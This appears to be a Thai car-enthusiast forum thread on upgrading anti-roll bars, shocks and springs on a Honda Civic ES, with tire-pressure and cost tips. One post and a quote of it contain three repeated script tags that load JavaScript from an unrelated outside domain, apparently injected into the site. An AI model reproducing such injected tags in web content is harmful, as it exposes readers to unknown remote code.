8 มีข้อเสียอะไรบ้างป่าวครับ อย่างแรกคือ ความนิ่มนวลอาจจะน้อยลง แต่ไม่แข็งแบบโช้คซิ่งใช่ป่าวครับ
-ข้อเสีย ยากจะอธิบายครับ แล้วแต่ฟิล ของแต่ละคน ครับ ผมชอบคุณอาจจะไม่ชอบ ของแบบนี้ตอ้งลองนั่งรถคนอื่นที่ เซ็ตโช๊ค ใกล้เคียง แต่ ต่างที่ กันโคลง

9 ต้องเปลี่ยนที่ไหนครับ ร้านยาง COCKPIT อะไรงี้ทำได้ป่าวครับ ค่าใช้จ่ายเท่าไหรครับ
-เปลี่ยนเองยังได้ครับ ไม่ยาก ถ้ามีของเดิมอยู่แล้ว
ได้รับคำขอบคุณจาก: K.panu  benzd  cisco  koonaea  jonatan  hacker  honeybeex7  kittidech  koobe  BALLJARAN35  zan  tokykung  chana  anugul 
PongpanG


ชื่อเล่น: ป๋องแป๋ง

เข้าร่วม: 11 สิงหา 2008
ตอบ: 3254

Moderator
Moderator

ได้รับคำขอบคุณ: 12524
ให้คำขอบคุณ: 3239

ที่อยู่: รังสิต
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 4 กรกฎา 2011 12:25 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
Makai พิมพ์ว่า:
puyzaaaaa พิมพ์ว่า:
ของผม รถ ปี 04 ช่างล่าง โช็คเดิมเลือนเบ้าหน้าลงสุด + สปิง TENI อัดน้ำมัน หน้าแข็ง หลัง พอนึบ

ใส่ค้ำหน้า ค้ำหลังบน ผมว่าในความเร็วขนาด 140 -180 นิ่งพอสมควรครับ(ผมว่านิ่งนะครับ)

อีกอย่างขับในเมือง ก็ไม่แข็งเกินไป ไม่ถึงขนาด ฟิลนักแข็ง

ขนาล้อ ของผม 205 45 17 ลมยาง 34 จำนวณห้องโดยสาร 2-3 คน ปกติ ครับ

แต่ผมไม่ทราบว่า ใส่กันโคลงใหญ่ขึ้นจะเห็นผลรึป่าวครับ ... แต่ตอนนี้ที่ว่ากำลังโอเคเลยครับ

ยังงัยเป็นแนวให้เจ้าของกระทู้ครับ



ขอนอกเรื่องหน่อยนะคับ รถพี่มีปัญหาพอเปลี่ยนใส่ปริงTeinแล้วรถเอียงป่ะคับ ของผมพอเปลี่ยนสปริงแล้วรถเอียงขวาอ่ะคับ แต่ผมยังไม่ได้เลื่อนเบ้านะ อืมแล้วผมอยากถามว่าพี่ที่ไปเลื่อนเบ้าอัดน้ำมันหน้าหลังมาพร้อมค่าแรงเท่าไรอ่ะ ยังไงรบกวนPMบอกผมหน่อยนะคับ ขอบคุนคร้าบบบบบ


เอียงทุกสปริงง่ะครับ ES เอียงขวา ครับ เลื่อนเบ้า 400 อัดน้ำมัน ก็ ต้นละ 400(รวมถอดใส่แล้ว)
ได้รับคำขอบคุณจาก: koonaea  hacker  honeybeex7  BALLJARAN35  chana 
mr.smith


เข้าร่วม: 26 มิถุนา 2009
ตอบ: 169

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 157
ให้คำขอบคุณ: 99

ที่อยู่: กำแพงเพชร
ปี: 2002
จันทร์, 4 กรกฎา 2011 12:32 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
ขอแจมนิดนะครับ ของผมปี02 มีแต่กันโคลงหน้า ข้างหลังไม่มี อยากทราบว่าเหล็กกันโคลงหน้ามันขนาดกี่มิลครับ แล้วถ้าผมจะใส่กันโคหลัง ไปเบิกของปี 01 มาใส่ถูกต้องหรือเปล่าครับ
ได้รับคำขอบคุณจาก: koonaea  chana 
koobe


ชื่อเล่น: นัท

เข้าร่วม: 19 มิถุนา 2010
ตอบ: 2462

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3437
ให้คำขอบคุณ: 2482

ที่อยู่: เพชรบุรี-กระทุ่มแบน-คลองเตย-ลาดกระบัง
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 4 กรกฎา 2011 13:55 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
mr.smith พิมพ์ว่า:
ขอแจมนิดนะครับ ของผมปี02 มีแต่กันโคลงหน้า ข้างหลังไม่มี อยากทราบว่าเหล็กกันโคลงหน้ามันขนาดกี่มิลครับ แล้วถ้าผมจะใส่กันโคหลัง ไปเบิกของปี 01 มาใส่ถูกต้องหรือเปล่าครับ


สวัสดีครับพี่อ๊อด(กำแพงเพชร) กันโครงหลังทั้งชุดแพงกว่าข้างหน้านะและถ้าจะติดตั้งต้องทำหูยึดกันโคลงด้วย พี่อ๊อตลองโทรหา BOY BOY ดูครับ เห็นบอกมีของศูนย์ แท้ๆถอดออกพร้อมลูกหมากทั้งชุด มากรุงเทพ ดิเดี๋ยวผมเชื่อมหูยึดอาร์มหลังให้อิอิ
ได้รับคำขอบคุณจาก: chana 
mr.smith


เข้าร่วม: 26 มิถุนา 2009
ตอบ: 169

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 157
ให้คำขอบคุณ: 99

ที่อยู่: กำแพงเพชร
ปี: 2002
จันทร์, 4 กรกฎา 2011 14:08 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
koobe พิมพ์ว่า:
mr.smith พิมพ์ว่า:
ขอแจมนิดนะครับ ของผมปี02 มีแต่กันโคลงหน้า ข้างหลังไม่มี อยากทราบว่าเหล็กกันโคลงหน้ามันขนาดกี่มิลครับ แล้วถ้าผมจะใส่กันโคหลัง ไปเบิกของปี 01 มาใส่ถูกต้องหรือเปล่าครับ


สวัสดีครับพี่อ๊อด(กำแพงเพชร) กันโครงหลังทั้งชุดแพงกว่าข้างหน้านะและถ้าจะติดตั้งต้องทำหูยึดกันโคลงด้วย พี่อ๊อตลองโทรหา BOY BOY ดูครับ เห็นบอกมีของศูนย์ แท้ๆถอดออกพร้อมลูกหมากทั้งชุด มากรุงเทพ ดิเดี๋ยวผมเชื่อมหูยึดอาร์มหลังให้อิอิ

แถมพักกลางด้วยนะ พี่นัท

ได้รับคำขอบคุณจาก: koonaea  chana 
puyzaaaaa


ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ที่อยู่: พิษณุโลก
ปี: 2004
จันทร์, 4 กรกฎา 2011 14:53 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
rung03 พิมพ์ว่า:
puyzaaaaa พิมพ์ว่า:
ของผม รถ ปี 04 ช่างล่าง โช็คเดิมเลือนเบ้าหน้าลงสุด + สปิง TENI อัดน้ำมัน หน้าแข็ง หลัง พอนึบ

ใส่ค้ำหน้า ค้ำหลังบน ผมว่าในความเร็วขนาด 140 -180 นิ่งพอสมควรครับ(ผมว่านิ่งนะครับ)

อีกอย่างขับในเมือง ก็ไม่แข็งเกินไป ไม่ถึงขนาด ฟิลนักแข็ง

ขนาล้อ ของผม 205 45 17 ลมยาง 34 จำนวณห้องโดยสาร 2-3 คน ปกติ ครับ

แต่ผมไม่ทราบว่า ใส่กันโคลงใหญ่ขึ้นจะเห็นผลรึป่าวครับ ... แต่ตอนนี้ที่ว่ากำลังโอเคเลยครับ

ยังงัยเป็นแนวให้เจ้าของกระทู้ครับ


ลมยาง 34 โอเคมั๊ยครับ ร้านที่ผมไปเปลี่ยนยางแนะนำให้เติมลมยาง 40 มากไปหรือป่าว ไม่รู้ว่ายางซีรี่นี้เขาเติมกันเท่าไหร่ ผมเติม 40 มาตลอดเลย


ผม ว่า 32-35 จะ โอเคมากครับ นุ่นนึบขับขี่ในเมือง 32 ถ้า เติ่มมากกว่านี้ ผม ว่าช่วยรักษาแม๊กไว้นะครับ เพือเจอ หลุมไม่ขาคคิด

แต่ ถ้าคุณเติม 40 ตลอด รอง ลดมา เหลือ สัก 34 33 ความนุ่มคนละเรื่องเลยครับ ^^"
ได้รับคำขอบคุณจาก: koonaea  BALLJARAN35  chana 
benzd


ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

ที่อยู่: เกตุม-มหาชัย-สมุทรสาคร
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 4 กรกฎา 2011 16:08 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
koobe พิมพ์ว่า:
ผมลองใส่แล้วกันโคลงใหญ่ๆ กับแบบเดิมๆติดรถ เห็นผลไม่ค่อยแตกต่างกันเท่าไร แต่ก็ดีกว่ารถที่ไม่มีกันโคลงเลย ลองโช๊คดีๆสักชุด เห็นผลแน่นอนกว่าครับ ตอนนี้ของคุณเอ๋ เปลี่ยนแต่สปริง เวลาขับเร็วๆแล้วรถไม่โยนหรือครับ(ถ้าใช้โช๊คเดิม) อัดน้ำมันโช๊คเดิมก็ช่วยได้อีกนิดหน่อย แนะนำให้ลอง EP3 หรือ DC5 น่าจะเหมาะกว่าใส่กันโคลงใหญ่ๆนะราคาก็พอไหว แต่ถ้ามีงบ จัด TEIN SS ชุดเดียวจบเลยครับ
พี่ครับ แล้วถ้าปลี่ยนใช้โช๊คที่คุณภาพสูงขึ้นการสึกหรอในส่วนอื่นจะมากขึ้นและไปไวไหมครับ
ได้รับคำขอบคุณจาก: koonaea  koobe  BALLJARAN35  chana 
koonaea


ชื่อเล่น: เอ๋

เข้าร่วม: 29 ธันวา 2008
ตอบ: 1097

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2962
ให้คำขอบคุณ: 434

ที่อยู่: ชลบุรี
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 4 กรกฎา 2011 20:54 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
ขอบคุณเพื่อนทุกคนเลยนะครับ สรูปที่ได้มาคือ

กันโคลงน่าจะมีประโยชน์พอสมควรเมื่อเราได้รีดความสามารถของมันออกมา
ก็คือ ขับธรรมดา ไม่น่าจะต่างมาก แต่ถ้าออกอาการเหวี่ยงเมื่อไหร่น่าจะเห็นผลชัดเจนแน่นอน เช่นขับซิกเเซก หรือลงคอสะพาน อันนี้ผมเข้าใจถูกต้องป่าวครับ

ปกติขับทางตรงผมว่านิ่งพอใช่อยู่แล้วตามเพื่อนว่าด้านบนเลยครับ แต่จังหวะแซง ซ้ายขวาเร็วๆ รถออกอาการโยนอย่างเห็นได้ชัดเลยครับ ก็เลยสนใจเจ้ากันโคลงนี่ละครับ

เพื่อนๆที่เชียร์ SS นี่ จริงๆแล้วอยากได้มากมายครับ ผมว่าน่าจะจบไปได้ระยะยาวพอควรเลย แต่งบยังไปไม่ถึงครับ ยังไงขอบคุณทุกคนเลยนะครับ


"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> .........เอ๋คร้าบ
ได้รับคำขอบคุณจาก: BALLJARAN35  zan  chana 
puyzaaaaa


ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ที่อยู่: พิษณุโลก
ปี: 2004
จันทร์, 4 กรกฎา 2011 23:19 - เดียวนะครับ พี่
PongpanG พิมพ์ว่า:
Makai พิมพ์ว่า:
puyzaaaaa พิมพ์ว่า:
ของผม รถ ปี 04 ช่างล่าง โช็คเดิมเลือนเบ้าหน้าลงสุด + สปิง TENI อัดน้ำมัน หน้าแข็ง หลัง พอนึบ

ใส่ค้ำหน้า ค้ำหลังบน ผมว่าในความเร็วขนาด 140 -180 นิ่งพอสมควรครับ(ผมว่านิ่งนะครับ)

อีกอย่างขับในเมือง ก็ไม่แข็งเกินไป ไม่ถึงขนาด ฟิลนักแข็ง

ขนาล้อ ของผม 205 45 17 ลมยาง 34 จำนวณห้องโดยสาร 2-3 คน ปกติ ครับ

แต่ผมไม่ทราบว่า ใส่กันโคลงใหญ่ขึ้นจะเห็นผลรึป่าวครับ ... แต่ตอนนี้ที่ว่ากำลังโอเคเลยครับ

ยังงัยเป็นแนวให้เจ้าของกระทู้ครับ



ขอนอกเรื่องหน่อยนะคับ รถพี่มีปัญหาพอเปลี่ยนใส่ปริงTeinแล้วรถเอียงป่ะคับ ของผมพอเปลี่ยนสปริงแล้วรถเอียงขวาอ่ะคับ แต่ผมยังไม่ได้เลื่อนเบ้านะ อืมแล้วผมอยากถามว่าพี่ที่ไปเลื่อนเบ้าอัดน้ำมันหน้าหลังมาพร้อมค่าแรงเท่าไรอ่ะ ยังไงรบกวนPMบอกผมหน่อยนะคับ ขอบคุนคร้าบบบบบ


เอียงทุกสปริงง่ะครับ ES เอียงขวา ครับ เลื่อนเบ้า 400 อัดน้ำมัน ก็ ต้นละ 400(รวมถอดใส่แล้ว)


มันเอียงแปป ไหน หรอครับ รถผมมันไม่เอียงอะครับ งงๆ เหมือน กันครับผม

ผม เลือนเบ้าหน้า มา 700 อัดน้ำมันต้นละ 900 อัด 4 ต้น ทำที่พิษณุโลก ครับ อยาก เข้าไป กทม. เหมือน กัน แต่ติดขัดหลายอย่าง

อ่อลืมไปครับ รองหลังขึ้นมา ครึ่งนิ้ว 600 บาท วิธีรอง เค้าตัดยาง อะไรก็ไม่รู้ มารองสปิงอะครับ แค่นั้นเอง ^^"
ได้รับคำขอบคุณจาก: koonaea  BALLJARAN35  chana 
koonaea


ชื่อเล่น: เอ๋

เข้าร่วม: 29 ธันวา 2008
ตอบ: 1097

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2962
ให้คำขอบคุณ: 434

ที่อยู่: ชลบุรี
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 19 กันยา 2011 21:00 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
koonaea พิมพ์ว่า:
ขอบคุณเพื่อนทุกคนเลยนะครับ สรูปที่ได้มาคือ

กันโคลงน่าจะมีประโยชน์พอสมควรเมื่อเราได้รีดความสามารถของมันออกมา
ก็คือ ขับธรรมดา ไม่น่าจะต่างมาก แต่ถ้าออกอาการเหวี่ยงเมื่อไหร่น่าจะเห็นผลชัดเจนแน่นอน เช่นขับซิกเเซก หรือลงคอสะพาน อันนี้ผมเข้าใจถูกต้องป่าวครับ

ปกติขับทางตรงผมว่านิ่งพอใช่อยู่แล้วตามเพื่อนว่าด้านบนเลยครับ แต่จังหวะแซง ซ้ายขวาเร็วๆ รถออกอาการโยนอย่างเห็นได้ชัดเลยครับ ก็เลยสนใจเจ้ากันโคลงนี่ละครับ

เพื่อนๆที่เชียร์ SS นี่ จริงๆแล้วอยากได้มากมายครับ ผมว่าน่าจะจบไปได้ระยะยาวพอควรเลย แต่งบยังไปไม่ถึงครับ ยังไงขอบคุณทุกคนเลยนะครับ


"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> .........เอ๋คร้าบ
ได้รับคำขอบคุณจาก: BALLJARAN35  chana 
hikaru_kung


เข้าร่วม: 29 ธันวา 2009
ตอบ: 3067

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4341
ให้คำขอบคุณ: 4602
จันทร์, 19 กันยา 2011 23:03 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
แล้วสรุปว่าคุณป๋องแป๋งใส่กันโคลงหน้าเท่าไหร่ และหลังเท่าไหร่เหรอครับ
ได้รับคำขอบคุณจาก: chana 
Black mOOn


ชื่อเล่น: โจ้

เข้าร่วม: 02 ตุลา 2008
ตอบ: 956

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2334
ให้คำขอบคุณ: 302

ที่อยู่: Rama7~ Bangkok
ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 20 กันยา 2011 17:08 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
EXI 04 คอนเฟริ์มอีกเสียงคับ จากเดิมๆไม่มีเลยทั้งหน้าและหลัง ตอนนี้ใส่หน้า 27 ส่วนข้างหลังรอใส่คับ เห็นผลขึ้นเลยคับ จะเข้าโค้งหรือมุดซ้ายขวา อาการโยนหายไปเยอะเลยคับรถนิ่งขึ้นเยอะ รู้สึกว่าพวงมาลัยมันจะตึงๆขึ้นนิดๆแน่นๆ อันนี้จากประสบการณ์รถตัวเองนะค๊าบ ใจอยากลอง บูชยูรีเทน+rigid+กันโคลง 27กะ22 ดูซิมันจะแน่นขนาดไหน
ได้รับคำขอบคุณจาก: chana 
FAIZ


ชื่อเล่น: ตั๊ก

เข้าร่วม: 30 กันยา 2008
ตอบ: 474

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 996
ให้คำขอบคุณ: 34

ที่อยู่: สุขุมวิท 3 / อโศก
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 20 กันยา 2011 19:15 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
ใส่ roll bar ด้วยจะรู้สึกดีขึ้นอีกนะคับ อิอิ
ได้รับคำขอบคุณจาก: chana 
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.